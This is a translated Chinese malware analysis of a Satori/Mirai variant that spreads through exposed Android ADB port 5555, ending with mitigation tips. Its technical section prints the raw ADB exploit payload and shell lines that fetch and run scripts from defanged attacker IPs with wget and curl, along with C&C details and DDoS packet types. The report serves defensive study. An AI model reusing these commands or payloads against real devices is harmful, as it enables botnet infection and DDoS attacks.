Satori變種利用開放的ADB埠在Android設備中傳播

寫在前面的話

對於許多物聯網用戶來說，利用設備上的開放埠一直是一個持續存在的問題。特別是TCP埠5555在過去遇到過問題，因為這是產品製造商在出廠之前將其打開，所以這可能會使用戶暴露給攻擊者。最近，我們在7月9日至10日和7月15日檢測到兩個可疑峰值，發現了這是一個使用埠5555的新漏洞。

該活動涉及名為Android Debug Bridge（ADB）的命令行實用程序，這是Android SDK的一部分，用於處理設備之間的通信，允許開發人員在Android設備上運行和調試應用程序。我們的數據顯示，第一波網路流量主要來自中國和美國，而第二波主要涉及韓國。

技術分析

根據我們對網路數據包的分析，我們確定惡意軟體通過掃描的開放式ADB埠進行傳播。它通過ADB連接刪除第1階段shell腳本，以在目標系統上啟動。此腳本下載兩個階段2 shell腳本，負責啟動階段3二進位文件。它通過TCP埠5555上傳payload.來攻擊ADB：「CNXN」,0,0,0,1,0,0×10,0,0,7,0,0,0,」2″,2,0,0,0xBC,0xB1,0xA7,0xB1,」host::」一旦載入到設備中，payload將從磁碟中刪除自身，並使用隨機選擇的名稱重命名，並附加架構字元串。payload將下載shell腳本，該腳本在執行後被刪除：

「OPENX」,2,0,0,0,0,0,0,0xF2,0×17,」J」,0,0,0xB0,0xAF,0xBA,0xB1,」shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://185[.]62[.]189[.]149/adbs -O -> adbs; sh adbs; curl hxxp://185[.]62[.]189[.]149/adbs2 > adbs2; sh adbs2; rm adbs adbs2″7月9日活動的shell腳本如下所示：cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs

相比之下，7月15日活動的payload代替了兩個腳本：早期的「adbs」和一個名為「adbs2」的新腳本。和以前一樣，它會在執行後刪除它們：cd /data/local/tmp/; busybox wget hxxp://185[.]62[.]189[.]149/adbs -O -> adbs; sh adbs; curl hxxp://185[.]62[.]189[.]149/adbs2 > adbs2; sh adbs2; rm adbs adbs2

這些腳本下載了幾個架構的下一個階段二進位文件，並啟動相應的版本。它們都做相同的事情，但使用不同的下載方法。第一個使用curl，第二個使用在BusyBox中構建的wget。wget版本的示例如下所示：

二進位文件首先從文件系統中刪除自己的二進位文件。然後它使用參數「yItDitb2HvayJvNc」檢查它自己的名字是否是「./.f」。如果結果是肯定的，它將使用主機名「n[.]ukrainianhorseriding[.]com」來解析C＆C的地址伺服器通過谷歌DNS伺服器。否則，它連線IP地址95[.]215[.]62[.]169，連接埠為7267。然後它將關閉所有三個stdio流並獲得自己的IP地址，然後啟動兩個子進程。第一個掃描/proc/[pid]/maps映射系統上所有正在運行的進程的內存映射區域，以打開臨時文件smi，xig或trinity。如果找到，它會殺死相應的進程。Trinity可能與Android系統模糊器有關，而smi是屬於CoinHive腳本的已知文件，該腳本在被劫持的亞馬遜設備上挖掘Monero。第二個子進程負責將惡意軟體作為蠕蟲傳播。二進位文件繼續將前面提到的所有三個pid以二進位形式寫入以下位

置之一：

然後二進位文件打開與C＆C伺服器的連接：

然後，它會將特製消息發送到C＆C伺服器。它的長度是71個位元組，如下所示：「WWau14TJ8IapVXrrlFq0q5sxB」, 「x00 80 00 5A 00 57 00 C8 00 F0 00 1E 00 00」和附加的體系結構字元串，即32位元組數組中的「arm7」。

每六個通信周期，受害者以6位元組序列（9,3,2,5,8,1）響應。此有效內容包含一個標頭，其中包含要發送的目標數和IP數據包類型，然後是被受感染主機修改的目標IPv4地址列表，這些目標IPv4地址由受感染主機修改並隨機生成的偏移量。然後，惡意軟體將帶有隨機生成的payload的精心製作的IP數據包發送到獲取的攻擊列表——可能是DDoS攻擊的一部分。IP數據包包括以下內容：

1.UDP隨機生成隨機長度的payload2.具有隨機長度的隨機payload的TCP SYN分組3.TCP ACK具有隨機長度的隨機payload4.通過通用路由封裝（GRE）隧道傳輸的隨機payload的UDP5.TCP SYN，之後它將發送TCP ACK並確保TCP窗口大小，源埠，seq_number和IP標識與前一個會話一致。每個數據包之間有三秒鐘的等待時間。從下載的二進位文件研究人員發現C＆C伺服器95[.]215[.]62[.]169鏈接到Mirai殭屍網路的Satori變體。深入研究活動中涉及的兩個IP地址的GeoIP信息，發現它們位於歐洲; 西班牙95[.]215[.]62[.]169和荷蘭185[.]62[.]189[.]149。我們有理由相信，這個樣本和Satori背後都是同一作者。使用簡單的XOR方法進行加密(參見圖8中的加密字元串示例)。有趣的是，與使用位元組交換和Base62編碼組合的舊樣本相比，此惡意軟體版本使用的複雜字元串加密方法較少

他們的解密值可以在下圖中看到。請注意，並非所有這些都已使用。

如前所述，蠕蟲功能和尋找其他潛在目標可能意味著我們檢測到的兩個活動峰值可能是另一個可能造成更多傷害的攻擊的前奏。也許在這種情況下，威脅參與者正在測試他們的工具和策略的有效性，以準備更嚴重的攻擊。C＆C域名信息顯示與域rippr[.]cc上的另一個C＆C伺服器相同的註冊電子郵件，該域名已經關閉：

Shodan的數據顯示，逾4.8萬個物聯網系統容易受到亞行開發利用的影響。並不是所有的脆弱系統都公開，因為它們通常隱藏在具有網路地址轉換(NAT)的路由器後面。但是，由於配置錯誤，可以手動或通過UPnP NAT遍歷訪問它們。所有的多媒體設備、智能電視、行動電話和其他沒有附加保護的設備都很容易成為惡意軟體攻擊的目標，不管用戶的密碼有多強。

解決方案

如果用戶願意改變移動設備的設置，就可以進入設置，選擇「開發者選項」，並確保「ADB (USB)調試」和「來自未知來源的應用程序」被關閉，後者默認設置為關閉，但必須進行雙重檢查以確保。如果用戶懷疑他們的設備已經被感染，進行工廠重置可以清除payload。作為一般規則，移動設備用戶應定期將其設備更新為最新版本。這些更新不僅可以改善其設備的功能，還可以解決攻擊者可以利用的漏洞。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！